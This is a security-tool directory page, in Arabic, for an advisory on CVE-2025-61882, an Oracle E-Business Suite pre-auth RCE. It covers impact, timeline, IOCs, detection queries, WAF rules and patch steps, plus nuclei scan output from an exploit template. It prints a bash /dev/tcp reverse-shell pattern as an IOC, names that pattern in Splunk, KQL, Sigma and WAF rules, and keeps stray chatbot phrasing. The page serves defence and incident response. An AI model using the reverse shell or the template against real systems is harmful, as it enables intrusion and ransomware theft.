Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Blackash-CVE-2025-61882 — يقدّم نشرة تفصيلية حول CVE-2025-61882 تتضمن تحليلًا تقنيًا، ومؤشرات الاختراق (IOCs)، واستعلامات كشف، وقالب استغلال قائم على Nuclei لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) قبل المصادقة في Oracle E-Business Suite. | Kitploit
أدوات/GitHubGitHub/222dff-afk/blackash-cve-2025-61882
تحليل الثغرات الأمنيةالاستغلالأمن الويباختبار الاختراقاستخبارات التهديداتالاستجابة للحوادث
GitHub222dff-afk/blackash-cve-2025-61882

Blackash-CVE-2025-61882

يقدّم نشرة تفصيلية حول CVE-2025-61882 تتضمن تحليلًا تقنيًا، ومؤشرات الاختراق (IOCs)، واستعلامات كشف، وقالب استغلال قائم على Nuclei لثغرة تنفيذ التعليمات البرمجية عن بُعد (RCE) قبل المصادقة في Oracle E-Business Suite.

عرض المستودع
2منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

🛡️🚨 CVE‑2025‑61882 — تنفيذ برمجي عن بُعد حرج قبل المصادقة في Oracle E‑Business Suite (EBS) 🚨🛡️

ملخص قصير: تنفيذ برمجي عن بُعد حرج قبل المصادقة في Oracle E‑Business Suite (EBS) — يؤثر على الإصدارات 12.2.3 → 12.2.14، درجة CVSS 9.8، يتم استغلاله بنشاط في البرية (تم الإبلاغ عن أنشطة ابتزاز/فدية). ([oracle.com][1])


📌 حقائق سريعة (جدول)

المجالالتفاصيل
🆔 CVECVE‑2025‑61882
🧾 المنتج / المكوّنOracle E‑Business Suite (EBS) — تكامل Concurrent Processing / BI Publisher
📦 الإصدارات المتأثرة12.2.3 → 12.2.14
🔢 درجة CVSS (v3.1)9.8 (AV:N/AC:L/PR:N/UI:N/C:H/I:H/A:H)
⚠️ النوعتنفيذ برمجي عن بُعد (RCE) — لا يتطلب مصادقة
🔥 تم استغلاله في البريةنعم — تم الإبلاغ عن حملات استغلال جماعي / ابتزاز
📅 الإفصاح / الجدول الزمنيأكتوبر 2025 (استشارة البائع + كتابات عامة). ([oracle.com][1])

(ما سبق تم تجميعه من استشارة البائع، NVD/CISA، وتحليلات متعددة من البائعين.) ([oracle.com][1])


💥 التأثير (جدول)

مجال التأثيرما يعنيه
🔓 السريةيمكن للمهاجمين قراءة بيانات حساسة للموارد البشرية/المالية/ERP
🛠️ السلامةيمكن للمهاجمين تعديل السجلات، إنشاء أبواب خلفية أو تغيير الإعدادات
⚡ التوفريمكن للمهاجمين تعطيل الخدمات، تنفيذ برامج فدية أو تدمير النسخ الاحتياطية
🧭 مستوى الخطرشديد — تنفيذ برمجي عن بُعد قبل المصادقة على نظام ERP حرج → احتمال توسع كامل في المجال

مراجع تشير إلى استغلال عالي التأثير وارتباط ببرامج الفدية. ([Rapid7][2])


🛠️ ملخص تقني (موجز)

  • الناقل: طلبات HTTP/HTTPS إلى نقاط نهاية EBS المعرّضة للإنترنت تؤدي إلى سلسلة ثغرات في تكامل Concurrent Processing / BI Publisher تؤدي إلى تنفيذ برمجي عن بُعد. ([oracle.com][1])
  • التعقيد: منخفض (بدون مصادقة، بدون تفاعل مستخدم). ([nvd.nist.gov][3])
  • الحمولات المرصودة: أنماط قشرة عكسية، قشور ويب، سكربتات تم إسقاطها تُستخدم لسرقة البيانات والابتزاز. ([Rapid7][2])

🕵️‍♀️ مؤشرات الاختراق (IOCs) — أمثلة (جدول)

نشرت Oracle ومستجيبو الحوادث مؤشرات IOC؛ فيما يلي أمثلة تمثيلية تم الإبلاغ عنها في الاستشارات وكتابات البائعين. ابحث عن هذه الأنماط في السجلات ونقاط النهاية. ([oracle.com][1])

النوعالمثال
🌐 عناوين IP (مرصودة)200.107.207.26, 185.181.60.11 (عناوين أمثلة تم الإبلاغ عنها)
🧾 نمط الأوامرsh -c /bin/bash -i >& /dev/tcp/<ip>/<port> 0>&1 (قشرة عكسية)
🗂️ تجزئات الملفاتعدة تجزئات SHA‑256 لسكربتات استغلال مشتبه بها (انظر استشارة البائع للقائمة الكاملة)
🕳️ القطع الأثريةقشور ويب غير متوقعة، مهام cron جديدة، اتصالات صادرة مشبوهة إلى عناوين/منافذ غير معتادة

إذا كنت تريد القائمة الكاملة لمؤشرات IOC (عناوين IP، التجزئات الكاملة، أسماء الملفات) يمكنني لصقها هنا — قل "paste IOCs". (بدون روابط.)


🧭 الجدول الزمني (مدمج)

التاريخالحدث
9 أغسطس 2025أول نشاط استغلال مُبلَغ عنه في العالم الحقيقي (قياس عن بُعد من البائع). ([crowdstrike.com][4])
أوائل أكتوبر 2025أصدرت Oracle تنبيهًا أمنيًا / توفر تصحيح لـ EBS. ([oracle.com][1])
6–7 أكتوبر 2025أضافت CISA الثغرة إلى كتالوج الثغرات المستغلة المعروفة (KEV) (إرشادات للوكالات الفيدرالية، تاريخ استحقاق للتخفيف). ([cisa.gov][5])
أكتوبر 2025 (مستمر)كتابات متعددة من البائعين وتقارير استغلال جماعي (CrowdStrike, Rapid7, Tenable, إلخ). ([crowdstrike.com][4])

✅ الإجراءات الموصى بها الفورية (جدول خطوات)

الأولويةالإجراءملاحظات / تفاصيل أمثلة
1️⃣ حرجةالتصحيح لمثيلات EBS المتأثرةطبق تصحيحات تنبيه Oracle الأمني للإصدارات 12.2.3–12.2.14 فورًا. ([oracle.com][1])
2️⃣ عاليةعزل / تقييد الوصول إلى نقاط نهاية EBS على الويباحظر HTTP/HTTPS المواجه للإنترنت إلى EBS؛ اسمح فقط بعناوين IP إدارية موثوقة أو VPN.
3️⃣ عاليةتفعيل/تعديل قواعد WAFانشر توقيعات WAF من البائعين/المجتمع لأنماط الاستغلال؛ احظر الحمولات المشبوهة. ([Rapid7][2])
4️⃣ عاليةالبحث والكشفابحث في السجلات عن أوامر قشرة عكسية، كتابات ملفات غير طبيعية، واتصالات صادرة إلى مؤشرات IOC.
5️⃣ حادثةالاحتواء والاستجابة إذا تم العثور على اختراقاعزل المضيف، حافظ على الأدلة الجنائية، غيّر بيانات الاعتماد، أعد البناء من نسخ احتياطية نظيفة.
6️⃣ سياسةالإبلاغ والإخطارإذا كنت ضمن نطاق المتطلبات التنظيمية/التعاقدية، أبلغ أصحاب المصلحة والسلطات وفقًا للسياسة (قد تنطبق إرشادات CISA/KEV). ([nvd.nist.gov][3])

💀 الاستغلالات :

root@kitploit:~
┌──(kali㉿kali)-[~]
└─$ nuclei -u http://10.10.10.10:8000 -t CVE-2025-61882.yaml                                                                                                  

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[INF] Scan completed in 485.722955ms. 1 matches found.
                                                                                                                                                                                                                                           
┌──(kali㉿kali)-[~]
└─$ nuclei -l targets.txt -t CVE-2025-61882.yaml                        

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

                projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.9 (latest)
[INF] New templates added in latest release: 182
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 7
[INF] Running httpx on input host
[INF] Found 7 URL from httpx
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Mon, 02 Oct 2023 13:57:20 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Wed, 20 Aug 2025 08:20:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sat, 31 Aug 2024 15:30:07 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Tue, 15 Aug 2023 16:58:09 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Fri, 30 Aug 2024 21:49:46 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http://10.10.10.10:8000 ["Sun, 16 May 2021 17:03:44 GMT"]
[CVE-2025-61882:last_modified_date] [http] [critical] http:/10.10.10.10:8000 ["Fri, 01 Sep 2023 13:20:35 GMT"]
[INF] Scan completed in 621.029991ms. 7 matches found.
CVE-2025-61882 Oracle E-Business Suite 1
CVE-2025-61882 Oracle E-Business Suite 4

🕵️‍♂️ استعلامات كشف نموذجية (سهلة النسخ واللصق)

Splunk (البحث عن نمط القشرة العكسية):

root@kitploit:~
index=web OR index=ebs_logs (uri_path="/cgi/*" OR uri_path="/xmlpserver/*") 
| search "* /bin/bash -i * /dev/tcp/*" OR "*/dev/tcp/* 0>&1*"
| table _time host src_ip user uri_path _raw

ELK / Kibana (KQL):

root@kitploit:~
http.request.body : "*bash -i*" or http.request.body : "* /dev/tcp/*"

قاعدة Sigma (مفاهيمية):

root@kitploit:~
title: Oracle EBS Reverse Shell via HTTP
detection:
  selection:
    EventID: 1234
    ProcessCommandLine|contains: "/dev/tcp/"
  condition: selection

(اضبط أسماء الحقول وفقًا لمخطط السجلات الخاص بك؛ استخدم مؤشرات IOC للتحسين.)


🔐 أمثلة على تخفيف جدار الحماية / WAF (أمثلة)

  • قائمة التحكم بالوصول (ACL): احظر الوارد 80/443 إلى خوادم EBS من الإنترنت العام؛ اسمح فقط بشبكة VPN الإدارية وعناوين IP إدارية محددة.
  • قاعدة WAF (شبه رمزية): احظر الطلبات التي تحتوي على bash -i, /dev/tcp/, base64 -d, أو أنماط حمولات استغلال نموذجية في أجسام POST أو معلمات URL.
  • تحديد المعدل / الحظر الجغرافي: حدد مؤقتًا معدل الطلبات إلى نقاط نهاية EBS واحظر حركة المرور من مناطق جغرافية معروفة بالخبث إذا كان ذلك متوافقًا مع احتياجات العمل.

🧾 قائمة التحقق للتصحيح (سريعة)

  1. خذ نسخًا احتياطية ولقطات لصور VM ✅
  2. اختبر التصحيح في بيئة تجريبية (إن أمكن) ✅
  3. طبق تصحيح تنبيه Oracle الأمني على EBS 12.2.3–12.2.14 ✅ (اتبع خطوات البائع: أوقف الخدمات، طبق التصحيح، نفذ مهام ما بعد التثبيت) ([oracle.com][1])
  4. أعد التشغيل وتحقق من سلامة الخدمة ✅
  5. أعد الفحص بحثًا عن قطع أثرية للاختراق ونفذ فحوصات جنائية كاملة للمضيف ✅

🧠 ملاحظات حول الجهة المهاجمة / الاستغلال

  • تنسب بائعون متعددون الاستغلال النشط إلى مجموعات مرتبطة بالابتزاز/برامج الفدية (مثل Cl0p / Graceful Spider أو جهات فاعلة ذات صلة) — تُستخدم لسرقة البيانات والابتزاز. تختلف درجة الثقة في الإسناد حسب البائع. ([crowdstrike.com][4])

📋 لفرق SOC / IR — قائمة تشغيلية

  • الفرز: محاولة استغلال واردة؟ التقط طلب HTTP والترويسات وجسم POST.
  • الاحتواء: اعزل شبكة المضيف المتأثر.
  • الطب الشرعي: اجمع الذاكرة، صورة القرص، سجلات خادم الويب، سجلات التدقيق.
  • المعالجة: أعد بناء المضيف من صورة نظيفة إذا تم تأكيد الاختراق.
  • الاسترداد: استعد من نسخ احتياطية معروفة الجودة؛ قم بتدوير بيانات الاعتماد.
  • الإبلاغ: سجل الحادثة، أبلغ أصحاب المصلحة، وامتثل لإرشادات KEV/CISA إذا كان ذلك applicable. ([nvd.nist.gov][3])

🔎 المصادر (قائمة مختصرة للتقارير الموثوقة)

(أدرج المصادر للدقة — لن ألصق الروابط هنا ولكن هذه أسماء البائعين/السلطات حتى يمكنك الرجوع إليها إذا لزم الأمر.)

  • تنبيه Oracle الأمني / توفر التصحيح (استشارة البائع). ([oracle.com][1])
  • NVD / CISA (إدخال كتالوج CISA KEV وبيانات NVD الوصفية). ([nvd.nist.gov][3])
  • التقرير الفني من CrowdStrike حول الحملات. ([crowdstrike.com][4])
  • تحليلات وأسئلة شائعة من Rapid7 / Tenable / بائعين آخرين. ([Rapid7][2])

إليك إخلاء مسؤولية احترافي غني بالرموز التعبيرية يمكنك استخدامه لتقرير CVE‑2025‑61882 الخاص بك:


⚠️💀 إخلاء المسؤولية 💀⚠️

المعلومات الواردة في هذا التقرير لأغراض التوعية والدفاع والتعليم فقط. استخدام هذه المعلومات لاستغلال أو مهاجمة أو اختراق أي نظام بدون إذن صريح غير قانوني وقد يؤدي إلى عقوبات جنائية ومدنية.

🔒 طبق دائمًا التصحيحات الموصى بها، واتبع أفضل ممارسات الأمان، وقم بإجراء الاختبارات في بيئات خاضعة للتحكم فقط.

🧾 هذا التقرير لا يحل محل الاستشارات الرسمية من البائع — استشر دائمًا تنبيهات Oracle الأمنية والإرشادات المعتمدة للحصول على تعليمات المعالجة النهائية.


تنزيل الأداة